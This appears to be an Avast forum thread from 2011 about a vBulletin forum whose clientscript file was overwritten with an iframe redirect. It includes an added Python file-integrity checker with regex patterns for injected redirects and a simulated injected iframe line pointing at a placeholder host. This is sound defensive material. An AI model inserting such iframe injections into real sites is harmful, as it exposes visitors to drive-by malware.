Hello everyone, I have been using the free edition of Avast for a few years now and I’m very happy with the product. OK, to the problem at hand: from last weekend up to the present, every time I visit a forum of which I am a member, Avast alerts me about a malware threat which it blocked.
Could this be a false positive?
I’m running WinXP with IE8 and Avast 5 free edition. I also have the free editions of Malwarebytes Anti-Malware and SuperAntiSpyware, and both have come up clean. I ran a deep scan with all of them only last week and all came back clean, so I’m a bit confused about what is going on and hope someone out there can help.
Info…
Object: http:/clientscript/vbulletin_md5. (Parts of this line I removed)
Infection: HTML:Iframe-inf
Action: Connection aborted
Process: C:\Program Files\Internet Explorer\iexplore.exe
How did you access that URL, as I see nothing in the direct link?
Using some other tools to analyse that JavaScript file URL doesn’t reveal anything. Of course there is always the possibility that what was there has been cleaned up.
Obviously we can’t access it that way, so we can’t check out why you are having the problem and we aren’t.
So I would suggest that you try accessing the page, etc. manually and see if you still get the alert; probably not. In which case it is likely to be something in the app, or what the app does, that triggers the avast alert.
Just tried the link from my bookmarks and it was clear. What I will do is keep an eye on the situation by opening the forum via the browser button and via the bookmark and see what the results are. If, as suggested, it could be the browser button, then I shall remove it and just use my bookmark link.
I will post here over the weekend with the results.
I found this thread during my remediation efforts on this forum. I’m the admin of the site, trying to deal with this outbreak.
First of all, thanks to all in this thread. I was better able to track the activity because of this. Thank you, Richard42, specifically. I always appreciate a member who actually gives a sh!t and looks for solutions rather than browsing along when they see a problem.
As well, props to avast itself. It is the only AV product that specifically identified the source of the attack on the website itself. All other products alerted me to the final IP source of the attack, but not the intermediate step on my own site. This is obviously what I need to know to remediate the malware.
Among other attacks, it turns out that hackers had used a vulnerability in the forum’s SEO to overwrite a file and insert a redirect:
hxxp:www.ww2f.com/clientscript/vbulletin_md5.js
This file has now been repaired and the software upgraded.
I’ve removed two other instances of infection, and I’m hoping a few of you might be able to assist me in ensuring that I’ve stamped this out. All I need is for a few of you to visit the site, and if you get any alerts, please post the “Object” portion of the warning here. This way I can identify and remove the problem. The attacks were targeting specific browsers, so if you can visit with more than one browser, that would be even better.
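The admin above found the compromise only because an AV product named the overwritten file; a webmaster can detect the same thing locally by keeping a hash baseline of the web root and scanning any changed file for injected iframe/redirect code. The following is an added example written for this thread, not code from vBulletin, avast or the forum operator; the file names, the suspicious-pattern list and the JavaScript contents are constructed assumptions for illustration.

```python
"""Added example (not from the thread or from vBulletin): take a SHA-256 baseline
of a web root's scripts, diff it after the fact, and scan changed files for the
kind of iframe/redirect injection the thread describes. File names, pattern
list and JS contents below are constructed assumptions."""
import hashlib
import json
import re
import tempfile
from pathlib import Path

# Indicators typical of injected redirect/iframe droppers. Assumed list, not
# derived from the thread; tune it for your own site.
INJECTION_PATTERNS = [
    re.compile(r"<iframe\b", re.I),
    re.compile(r"document\.write\s*\(", re.I),
    re.compile(r"(window\.|top\.)?location(\.href)?\s*=(?!=)", re.I),
    re.compile(r"eval\s*\(\s*(unescape|atob|String\.fromCharCode)", re.I),
    re.compile(r"(\\x[0-9a-f]{2}){8,}", re.I),  # long hex-escaped blobs
]

# Constructed stand-ins: a "clean" script and the tail an attacker might append.
CLEAN_JS = ("// constructed stand-in for a legitimate clientscript file\n"
            "function md5hash(v, f, s, t) { if (s) { s.value = 1; } return v; }\n")
INJECTED_TAIL = ("document.write('<iframe src=\"http://example.invalid/r.php\" "
                 "width=1 height=1></iframe>');\n")

def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def build_manifest(root: Path, exts=(".js", ".php", ".html")) -> dict:
    """SHA-256 of every watched file, keyed by forward-slash relative path."""
    return {
        str(p.relative_to(root)).replace("\\", "/"): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file() and p.suffix.lower() in exts
    }

def save_manifest(manifest: dict, out: Path) -> None:
    """Store the baseline off the web server; on it, an attacker can edit it too."""
    out.write_text(json.dumps(manifest, indent=2, sort_keys=True), encoding="utf-8")

def diff_manifest(root: Path, baseline: dict) -> dict:
    """Compare the current tree to the baseline: modified, added and missing paths."""
    current = build_manifest(root)
    return {
        "modified": sorted(k for k in baseline if k in current and current[k] != baseline[k]),
        "added": sorted(k for k in current if k not in baseline),
        "missing": sorted(k for k in baseline if k not in current),
    }

def scan_for_injection(path: Path) -> list:
    """Return the patterns matched in the file (empty list means nothing flagged)."""
    text = path.read_text(encoding="utf-8", errors="replace")
    return [pat.pattern for pat in INJECTION_PATTERNS if pat.search(text)]

def demo() -> dict:
    """Constructed walk-through: baseline a tree, simulate the overwrite, detect it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        js_dir = root / "clientscript"
        js_dir.mkdir()
        target = js_dir / "vbulletin_md5.js"
        target.write_text(CLEAN_JS, encoding="utf-8")
        (js_dir / "vbulletin_global.js").write_text("var vb = {};\n", encoding="utf-8")
        baseline = build_manifest(root)           # taken while the site is known good
        target.write_text(CLEAN_JS + INJECTED_TAIL, encoding="utf-8")  # simulated tampering
        diff = diff_manifest(root, baseline)
        hits = {p: scan_for_injection(root / p) for p in diff["modified"]}
        return {"diff": diff, "hits": hits}

if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run `build_manifest` and `save_manifest` right after a clean install or upgrade, keep the manifest somewhere the web server process cannot write, and re-run `diff_manifest` from cron; the pattern scan is only a triage aid for the files that changed, since a legitimate upgrade also changes hashes and a careful attacker can obfuscate past a fixed regex list.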
Hi,
As I’m now at work, and here I’m stuck with KAV (admin’s choice ;D), I tried to access the site with IE, FF, and Chrome, and it seems clean, well, from KAV’s “point of view”.
Report: 2011-03-11 11:23:17 (GMT 1)
Website: ww2f.com
Domain Hash: de276e97f9c94027062c4c023d7beb83
IP Address: 75.127.98.38 [SCAN]
IP Hostname: server.ww2f.com
IP Country: US (United States)
AS Number: 3595
AS Name: GNAXNET-AS - Global Net Access, LLC
Detections: 1 / 18 (6 %)
Status: SUSPICIOUS

Report: 2011-03-11 11:07:13 (GMT 1)
IP Address: 75.127.98.38
IP Hostname: server.ww2f.com
IP Country: US
AS Number: N/A
AS Name: N/A
Detections: 0 / 26 (0 %)
Status: CLEAN
I appreciate this feedback Asyn, but what am I looking at? According to the timestamps it indicates that the site was CLEAN at 2011-03-11 11:07:13 and then was rated SUSPICIOUS 14 minutes later at 2011-03-11 11:23:17. Is this accurate or are the Avast times off?
Forget the time stamps…!
What’s important for you, is that your site seems to be clean. (at time of scanning)
So, do you still get a warning from avast…??
asyn
http://www.urlvoid.com/ has a bunch of scanners in one place. Anyway, I don’t get any warning from avast! ATM, so it looks like you have fixed it.
On another note, AVs are not the best way of reminding a webmaster that they are using a vulnerable webapp; the vendor should provide some mailing list to subscribe to.
@ Asyn,
Thanks for the feedback. Still a bit confused about the timestamps, but as long as I am clear I’m happy. Thankfully, no more warnings from avast.
@ doktornotor
Nice multiple scanner; it also showed no infections. And for the record, I know about AV not being good for determining a site’s health. I always try to stay patched. The reason I posted here (see my first post in this thread) was that avast was the only product that identified the specific script on my site that was performing the attack, which allowed me to better remediate the problem.